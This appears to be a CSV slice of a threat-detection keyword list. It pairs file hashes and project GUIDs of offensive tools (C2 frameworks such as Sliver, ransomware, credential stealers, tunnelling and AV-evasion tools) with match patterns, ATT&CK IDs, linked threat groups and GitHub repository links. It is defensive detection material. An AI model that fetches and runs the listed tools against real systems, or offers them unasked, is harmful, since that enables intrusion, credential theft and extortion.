"*5e072a48d093df02065faaeee6bbc019e1e6c4ac85ae0b00726c5dc216886bb1*",".{0,1000}5e072a48d093df02065faaeee6bbc019e1e6c4ac85ae0b00726c5dc216886bb1.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","27545"
"*5E0812A9-C727-44F3-A2E3-8286CDC3ED4F*",".{0,1000}5E0812A9\-C727\-44F3\-A2E3\-8286CDC3ED4F.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","#GUIDproject","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","27546"
"*5e1350993991046a366a985916360cf8024f2ecbc6bf595da691226e546b14fd*",".{0,1000}5e1350993991046a366a985916360cf8024f2ecbc6bf595da691226e546b14fd.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27548"
"*5e155e9adb8422b5b194169e1819096c0877adf8b409a32f287ad82a55add44a*",".{0,1000}5e155e9adb8422b5b194169e1819096c0877adf8b409a32f287ad82a55add44a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27549"
"*5e16331a5e5b6bf1c82658272e49d8f28bcac62bd222e08f530ee9062ca16b23*",".{0,1000}5e16331a5e5b6bf1c82658272e49d8f28bcac62bd222e08f530ee9062ca16b23.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","27550"
"*5e1751b6c6f16bf4b147c3ccbf156e6d5b30ce2f14419a97cefc7b2487abb24f*",".{0,1000}5e1751b6c6f16bf4b147c3ccbf156e6d5b30ce2f14419a97cefc7b2487abb24f.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","27551"
"*5e1896cd6c5bc82e6369f5e143bf87a59b37775c7987d36e29ff1846c4863d98*",".{0,1000}5e1896cd6c5bc82e6369f5e143bf87a59b37775c7987d36e29ff1846c4863d98.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27552"
"*5e1d5d651348c7b8066cab1d5341b7f38fb8271a7ff6add68876e7f83cbecf63*",".{0,1000}5e1d5d651348c7b8066cab1d5341b7f38fb8271a7ff6add68876e7f83cbecf63.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","27553"
"*5e2406b0687127f8980b1d73f475edb5410d6337cdf022a3d8b354c88c64c30b*",".{0,1000}5e2406b0687127f8980b1d73f475edb5410d6337cdf022a3d8b354c88c64c30b.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27554"
"*5e25477af34314dc8fd4fe2013845ec55572ac213148b70499b928bc4af1f1c1*",".{0,1000}5e25477af34314dc8fd4fe2013845ec55572ac213148b70499b928bc4af1f1c1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27555"
"*5e26c68699b11eafab62369502fbbacd7797327a7f5d5a9b84e632220935d1d0*",".{0,1000}5e26c68699b11eafab62369502fbbacd7797327a7f5d5a9b84e632220935d1d0.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27556"
"*5e2c017817ac29d2717628ba6fd14b3be13ada1c74afd77ee80c1312a6f5586b*",".{0,1000}5e2c017817ac29d2717628ba6fd14b3be13ada1c74afd77ee80c1312a6f5586b.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","27558"
"*5e3261026ae988a6e7d629e1201733ea922d06b37d4d07df2223a1427ea8c63c*",".{0,1000}5e3261026ae988a6e7d629e1201733ea922d06b37d4d07df2223a1427ea8c63c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27559"
"*5e3d3d353d87bb0b41714922c72dc61f16d4bb3f20990ccb9be75b9689e864aa*",".{0,1000}5e3d3d353d87bb0b41714922c72dc61f16d4bb3f20990ccb9be75b9689e864aa.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","#filehash","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","27561"
"*5e438cc32aa2a58190adc379d070d815afd1b03284eb7922b8daed40014ad1ef*",".{0,1000}5e438cc32aa2a58190adc379d070d815afd1b03284eb7922b8daed40014ad1ef.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","27563"
"*5e4934f815abdfbab50576d3c7d2bd7d192b759c3816ab0089ec3d06bb3c0945*",".{0,1000}5e4934f815abdfbab50576d3c7d2bd7d192b759c3816ab0089ec3d06bb3c0945.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27565"
"*5e55e91e64bb5011ac10ce8c1d90a3e9368f0ebdb6b0caa59fff7eed51393cb3*",".{0,1000}5e55e91e64bb5011ac10ce8c1d90a3e9368f0ebdb6b0caa59fff7eed51393cb3.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27567"
"*5e58cd83a2f4613303713489e819e69a42109141e3c998e21bf25906b45eeb30*",".{0,1000}5e58cd83a2f4613303713489e819e69a42109141e3c998e21bf25906b45eeb30.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","27568"
"*5e5a0618107570e45d2d2559d13658fb0e08f732*",".{0,1000}5e5a0618107570e45d2d2559d13658fb0e08f732.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","27569"
"*5e5e21abed5ff9e25cd2ea1c626a1f0ffe6194d1e2c74dfec8aebc0789b2dee1*",".{0,1000}5e5e21abed5ff9e25cd2ea1c626a1f0ffe6194d1e2c74dfec8aebc0789b2dee1.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","#filehash","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","27570"
"*5e60bc27d24e7a5b641fa59ee55002dae44ce9dde494df9783a9aa002455c6d2*",".{0,1000}5e60bc27d24e7a5b641fa59ee55002dae44ce9dde494df9783a9aa002455c6d2.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","#filehash","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","27571"
"*5e68b0a2d0424b4afb739ac7938e49ec2e9cb41999346aee22c0284aa1cdcf5c*",".{0,1000}5e68b0a2d0424b4afb739ac7938e49ec2e9cb41999346aee22c0284aa1cdcf5c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27572"
"*5e6aca1735a130c574685542a7a89b5bab4d4e1bacfe1279ec76189b0bec6fd5*",".{0,1000}5e6aca1735a130c574685542a7a89b5bab4d4e1bacfe1279ec76189b0bec6fd5.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","27573"
"*5e6cfa7f3d2e7bf2eadb2d4f197189d43798b3270c39bbe3a2fb99c5684ec686*",".{0,1000}5e6cfa7f3d2e7bf2eadb2d4f197189d43798b3270c39bbe3a2fb99c5684ec686.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27574"
"*5e7519bba332d03aaca2ab30275e2afcea4b45abd4204ad3d97054775d55b830*",".{0,1000}5e7519bba332d03aaca2ab30275e2afcea4b45abd4204ad3d97054775d55b830.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27577"
"*5e77fa12d0f1b9a4a7249a6a496f8236552bc0adcbe818d9e997e1ca68819224*",".{0,1000}5e77fa12d0f1b9a4a7249a6a496f8236552bc0adcbe818d9e997e1ca68819224.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","27578"
"*5E8106A6F89B053ED91C723D5D4CAE3FFC15F1CE*",".{0,1000}5E8106A6F89B053ED91C723D5D4CAE3FFC15F1CE.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","27582"
"*5e87e7fe137ab8f51780b6646e74e942efa89a4ff95cb190dd0bf35a5dcf59e8*",".{0,1000}5e87e7fe137ab8f51780b6646e74e942efa89a4ff95cb190dd0bf35a5dcf59e8.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#filehash","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","27583"
"*5e8d04c49ec9bac3e5269c5054dab440fd521a3840b9c8702e8ecadc01d392a6*",".{0,1000}5e8d04c49ec9bac3e5269c5054dab440fd521a3840b9c8702e8ecadc01d392a6.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27584"
"*5e8f9273ea80b99b0ee172727808e3293a61f7788a534d0ad9a824c9c6753bf0*",".{0,1000}5e8f9273ea80b99b0ee172727808e3293a61f7788a534d0ad9a824c9c6753bf0.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27585"
"*5E9715AB-CAF7-4FFF-8E14-A8727891DA93*",".{0,1000}5E9715AB\-CAF7\-4FFF\-8E14\-A8727891DA93.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","27586"
"*5e98194a01c6b48fa582a6a9fcbb92d6*",".{0,1000}5e98194a01c6b48fa582a6a9fcbb92d6.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","27587"
"*5ea4f3837040a1342e8eed81e10d5dcf1e28f1b67478d8cd421007201758995f*",".{0,1000}5ea4f3837040a1342e8eed81e10d5dcf1e28f1b67478d8cd421007201758995f.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","27591"
"*5ea7260956640dae112bc2bcc9bd1e0fbf43a6efccd0cc56d95cfecf8af241b1*",".{0,1000}5ea7260956640dae112bc2bcc9bd1e0fbf43a6efccd0cc56d95cfecf8af241b1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27592"
"*5eabd7d957e56a9cb9a918f7e9f72dc76a0481954c2f93ad5264095b5dbb6897*",".{0,1000}5eabd7d957e56a9cb9a918f7e9f72dc76a0481954c2f93ad5264095b5dbb6897.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","27593"
"*5eabd7d957e56a9cb9a918f7e9f72dc76a0481954c2f93ad5264095b5dbb6897*",".{0,1000}5eabd7d957e56a9cb9a918f7e9f72dc76a0481954c2f93ad5264095b5dbb6897.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","27594"
"*5eabd7d957e56a9cb9a918f7e9f72dc76a0481954c2f93ad5264095b5dbb6897*",".{0,1000}5eabd7d957e56a9cb9a918f7e9f72dc76a0481954c2f93ad5264095b5dbb6897.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","27595"
"*5eb106f4e859025654fcab29697c9b4599545b89da2ddd9c5db318c0b53cd66d*",".{0,1000}5eb106f4e859025654fcab29697c9b4599545b89da2ddd9c5db318c0b53cd66d.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","27596"
"*5eb4a246d7a9adaffedd89bcca6d86ba57a30380ce90438b57a45e61b9e06ec0*",".{0,1000}5eb4a246d7a9adaffedd89bcca6d86ba57a30380ce90438b57a45e61b9e06ec0.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","27597"
"*5eb8024e00c244de2646f2b338be02e7a6475637fd04894a3e13d37783b0d693*",".{0,1000}5eb8024e00c244de2646f2b338be02e7a6475637fd04894a3e13d37783b0d693.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","#filehash","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","27598"
"*5ebd789e726c94beb41e0934df6fb9bf62af28cc87093b9785dc9baa4ecde96b*",".{0,1000}5ebd789e726c94beb41e0934df6fb9bf62af28cc87093b9785dc9baa4ecde96b.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27600"
"*5EC16C3F-1E62-4661-8C20-504CB0E55441*",".{0,1000}5EC16C3F\-1E62\-4661\-8C20\-504CB0E55441.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","#GUIDproject","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","27601"
"*5ecc5632202031a45845046c5c8287530dbbdfb724af5ee412063865cf37d58e*",".{0,1000}5ecc5632202031a45845046c5c8287530dbbdfb724af5ee412063865cf37d58e.{0,1000}","offensive_tool_keyword","PrivFu","enable or disable specific token privileges for a process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","SwitchPriv","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","27602"
"*5ED2F78E-8538-4C87-BCED-E19E9DAD879C*",".{0,1000}5ED2F78E\-8538\-4C87\-BCED\-E19E9DAD879C.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","#GUIDproject","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","27603"
"*5ed84b98241dd1db44e9e3beae6ec07ce8c64cd9200b73954617113578f91317*",".{0,1000}5ed84b98241dd1db44e9e3beae6ec07ce8c64cd9200b73954617113578f91317.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","27604"
"*5ed84b98241dd1db44e9e3beae6ec07ce8c64cd9200b73954617113578f91317*",".{0,1000}5ed84b98241dd1db44e9e3beae6ec07ce8c64cd9200b73954617113578f91317.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","27605"
"*5ee47f66e30d5ccc81ab8a3df639396b7e45aee360906b08012d06cdc6a13ff9*",".{0,1000}5ee47f66e30d5ccc81ab8a3df639396b7e45aee360906b08012d06cdc6a13ff9.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27606"
"*5eec8d9cc549596b2f6b9bc955202ef6be8e2b74849769904af8aceb477c5044*",".{0,1000}5eec8d9cc549596b2f6b9bc955202ef6be8e2b74849769904af8aceb477c5044.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27607"
